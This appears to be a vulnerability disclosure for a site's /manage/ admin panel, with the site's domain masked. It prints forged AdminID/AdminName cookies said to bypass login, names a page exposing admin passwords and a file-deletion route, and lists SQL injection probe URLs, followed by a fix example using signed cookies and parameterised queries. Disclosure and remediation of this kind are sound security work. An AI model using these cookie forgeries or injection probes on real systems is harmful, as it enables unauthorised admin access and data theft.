(Reporting a bundle of issues this time, hoping for an invitation code)
Admin back-end entry point:
/manage/login.aspx
Forging the following cookies is enough to bypass the login:
[{
"domain": ".xxx.com",
"expirationDate": 1392975480,
"hostOnly": false,
"httpOnly": false,
"name": "AdminID",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "1"
},
{
"domain": ".xxx.com",
"expirationDate": 1392975480,
"hostOnly": false,
"httpOnly": false,
"name": "AdminName",
"path": "/",
"secure": false,
"session": false,
"storeId": "0",
"value": "admin"
}]
Administrator account names and passwords are exposed at:
/manage/admins.aspx

Arbitrary file download/deletion:
Journal Downloads - Add Download Document (deleting this entry also deletes the file it points to)


SQL injection:
/manage/EditAdmin.aspx?ID=1'
/manage/EditAdmin.aspx?ID=1 and 1=1

Fix:
Filter and validate input
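
One way to apply this fix to the cookie bypass and the ID injection above, as an added example that is not part of the original report or the affected application (the site is ASP.NET; Python is used here for illustration). The key, the cookie layout, the function names and the admins table are assumptions.

```python
import hashlib
import hmac
import re
import sqlite3
import time

# Constructed key for this example; assume the real one lives in server-side config.
SECRET_KEY = b"constructed-example-key"
DIGITS = re.compile(r"[0-9]{1,10}")  # plain ASCII integer, nothing else


def _mac(payload):
    return hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_admin_cookie(admin_id, ttl=1800, now=None):
    """Issued only after a successful password check: 'id.expiry.mac'."""
    expiry = int((time.time() if now is None else now) + ttl)
    payload = "%d.%d" % (admin_id, expiry)
    return payload + "." + _mac(payload)


def verify_admin_cookie(value, now=None):
    """Return the admin id if the cookie is authentic and unexpired, else None."""
    parts = value.split(".")
    if len(parts) != 3:
        return None  # a bare "1", as in the forged AdminID cookie, lands here
    admin_id, expiry, mac = parts
    if not (DIGITS.fullmatch(admin_id) and DIGITS.fullmatch(expiry)):
        return None
    expected = _mac(admin_id + "." + expiry)
    if not hmac.compare_digest(expected.encode(), mac.encode("utf-8", "replace")):
        return None  # id or expiry was changed, or the MAC does not match
    if int(expiry) < (time.time() if now is None else now):
        return None
    return int(admin_id)


def load_admin(db, raw_id):
    """EditAdmin-style lookup: validate ID as an integer, then bind it as a parameter."""
    if not DIGITS.fullmatch(raw_id):
        return None  # rejects "1'" and "1 and 1=1" before any SQL runs
    row = db.execute("SELECT id, name FROM admins WHERE id = ?", (int(raw_id),))
    return row.fetchone()
```

Every page under /manage/ would call the cookie check before doing any work, so a client-chosen AdminID or AdminName value carries no authority on its own.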